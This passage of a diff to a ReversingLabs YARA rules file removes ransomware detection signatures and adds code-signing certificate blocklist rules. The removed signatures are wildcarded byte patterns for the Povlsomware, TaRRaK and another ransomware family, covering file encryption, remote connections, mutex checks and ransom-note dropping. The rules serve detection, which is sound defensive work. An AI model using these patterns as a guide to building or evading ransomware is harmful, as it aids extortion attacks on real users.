?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? - ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ?? - ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? - ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 - B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D - } - $create_scheduled_task_v1 = { - FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ?? - 41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66 - A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ?? - ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B - F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 - E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1 - ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88 - 41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68 - ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection_v1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B - 5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A - ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24 - ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 - ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ?? - 6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $check_mutex_v1 = { - E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84 - C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 - } - $find_files_v2 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53 - 56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 - ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D - ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? - ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? - 3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? - 51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 - ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56 - 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B - 7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3 - 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ?? - ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45 - } - $encrypt_files_v2_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ?? - 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8 - ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? - ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 - 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 - 75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ?? - A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88 - 41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ?? - ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB - ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? - 85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 - } - $encrypt_files_v2_p2 = { - E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF - 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ?? - 89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ?? - 50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF - 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03 - F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ?? - 50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? - 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? - ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D - ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45 - } - $remote_connection_v2 = { - 55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 - FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? - 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? - 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E - 33 C0 5B 8B E5 5D C3 - } - $drop_ransom_note_v2_p1 = { - 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? - C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7 - 40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ?? - ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 - ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04 - 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46 - 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 - 53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B - D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 - } - $drop_ransom_note_v2_p2 = { - E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ?? - 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? - F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? - 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? - 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84 - C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? - ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66 - 90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? - 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B - CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51 - 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ((( all of ($encrypt_files_v1_p*)) and ( all of ($find_files_v1_p*)) and ($create_scheduled_task_v1) and ($remote_connection_v1) and ($check_mutex_v1)) or (($find_files_v2) and ( all of ($encrypt_files_v2_p*)) and ($remote_connection_v2) and ( all of ($drop_ransom_note_v2_p*)))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures[i].serial=="0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE { meta: - description = "Yara rule that detects Povlsomware ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26" - date = "2021-08-12" - modified = "2021-08-12" + id = "4206c383-0e6d-5129-8e6a-05bd54c48e65" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12424-L12440" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Povlsomware" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $setup_attack = { - 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ?? - 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? - 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D - 09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 - ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ?? - ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? - 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 - DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC - 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A - } - $find_files = { - 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ?? - 08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ?? - DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ?? - ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00 - DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A - } - $encrypt_files = { - 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ?? - ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A - } - condition: - uint16(0)==0x5A4D and ($setup_attack) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Crossfire Industries, LLC" and pe.signatures[i].serial=="07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE { meta: - description = "Yara rule that detects TaRRaK ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a783df87-0c9b-5868-9af0-c32b11e8b71b" - date = "2021-09-06" - modified = "2021-09-06" + id = "445bb30e-e021-5a75-a47e-29fa567acfa5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12442-L12460" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TaRRaK" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D - ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? - 02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? - 0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ?? - 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A - } - $encrypt_files_p2 = { - 03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B - ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03 - 11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 - ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08 - 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ?? - 03 2A - } - $encrypt_files_p3 = { - 05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61 - D4 95 05 61 58 61 2A - } - $encrypt_files_p4 = { - 03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A - } - $find_files_p1 = { - 73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 - 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? 